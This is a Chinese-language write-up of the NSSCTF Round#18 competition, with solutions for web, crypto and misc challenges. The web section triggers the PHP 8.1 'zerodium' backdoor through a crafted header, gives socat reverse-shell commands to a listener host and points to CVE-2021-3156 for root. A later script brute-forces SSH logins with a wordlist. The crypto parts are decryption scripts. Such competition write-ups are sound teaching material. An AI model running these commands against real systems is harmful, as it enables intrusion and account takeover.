NSSCTF Round#18 Writeup

Web

Becomeroot

首先是个php8.1的后门zerodium

在请求头里加上User-Agentt: zerodium{cmd}可以实现RCE。

直接弹shell。弹shell之后使用socat增加tty。

#反弹机：
socat file:`tty`,raw,echo=0 tcp-listen:4444
#靶机
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.11.100:4444

然后用CVE-2021-3156拿root权限即可。

Crypto

过年来下棋

棋盘密码

类型：ADFGVX，密码lucky。

年画

首先可以发现enc_c是用NSSCTF{^key得到的。所以key可以直接拿到。然后就反过来写一个解密就行了。

from PIL import Image
from Crypto.Cipher import AES
from Crypto.Util.Padding import *

enc_c=b'&2#3-(\\x1e9*6"&$\\x02=&'
flag=b"NSSCTF{"
key=b""
for i in range(len(enc_c)):
    key += bytes([enc_c[i] ^ flag[i % 7]])

print("[+] Got key: ", key)
w,h = Image.open("random_image.png").size
print(f"[+] Image size: {w}x{h}")
bin_data = "".join(open("cipher.txt").readlines()).replace("\\n", "")
bin_data = [int(bin_data[i:i+8],2) for i in range(0, len(bin_data), 8)]
pixel_data = [bin_data[i:i+3] for i in range(0, len(bin_data), 3)]
print(f"[+] Binary data pixels: {len(pixel_data)}")
print("[+] Recover Pixels with RGB to cipher.png")
img = Image.new("RGB", (w,h))
pixels = img.load()
for x in range(w):
    for y in range(h):
        pixels[x,y] = tuple(pixel_data[x*h+y])
print("[+] Recover cipher.png with key and save to flag.png")
pixels = img.tobytes()
cipher = AES.new(key, AES.MODE_ECB)
dec_pixels = cipher.decrypt(pixels)
# dec_unpad = unpad(dec_pixels, AES.block_size)
dec_img = Image.frombytes(img.mode, img.size, dec_pixels)
dec_img.save("flag.png")
print("[+] Done! Check flag.png for the flag!")

Misc

温馨的酒吧

成分复杂的一道题（）

反正整个交互树都看一遍就有了。

Number 7

cisco设备上的type7加密。

奇奇怪怪的原因最后两位解密不了。后来看了下发现最后两位直接是明文。

from binascii import unhexlify
r = "182A1918071C152E0A4737263A3E780A6F6A075A112742777C687D0700773F7D39560063487D"
r = unhexlify(r[2:])
key = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"
print("[+] Cipher: ",r)
for salt in range(52):
    f = b""
    for i in range(len(r[:-2])):
        f += bytes([r[i] ^ key[(i+salt)% len(key)]])
    f += r[-2:]
    if b"NSSCTF" in f:
        print("[+] Found salt: ", salt)
        print("[+] Decrypted: ", f)
        break

usersssssssss和revenge

其实是同一个题，后面一个把wordlist加长了，flag放在.flag.txt下。（直接ls是看不到的）

直接用paramiko库写了脚本。

import paramiko
import hashlib
import logging

logging.getLogger("paramiko").setLevel(logging.DEBUG)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())


users = open("wl.txt").read().split("\\n")
passs = [hashlib.md5(user.encode()).hexdigest() for user in users]

for user, passw in zip(users, passs):
    try:
        client.connect("node2.anna.nssctf.cn",28808,username=user,password=passw)
        stdin, stdout, stderr = client.exec_command("ls -a")
        r = stdout.read().decode().split("\\n")
        flag = [i for i in r if "flag" in i]
        print(f"[*] {user} {passw} run ls with output {r}")
        if flag != []:
            print(f"[+] Found flag in user {user} with password {passw}!")
            stdin, stdout, stderr = client.exec_command(f"cat {flag[0]}")
            print(f"[+] Flag: {stdout.read().decode()}")
            break

    except Exception as e:
        print(f"[-] Failed with user {user} and password {passw}: {e}")
        pass
    finally:
        client.close()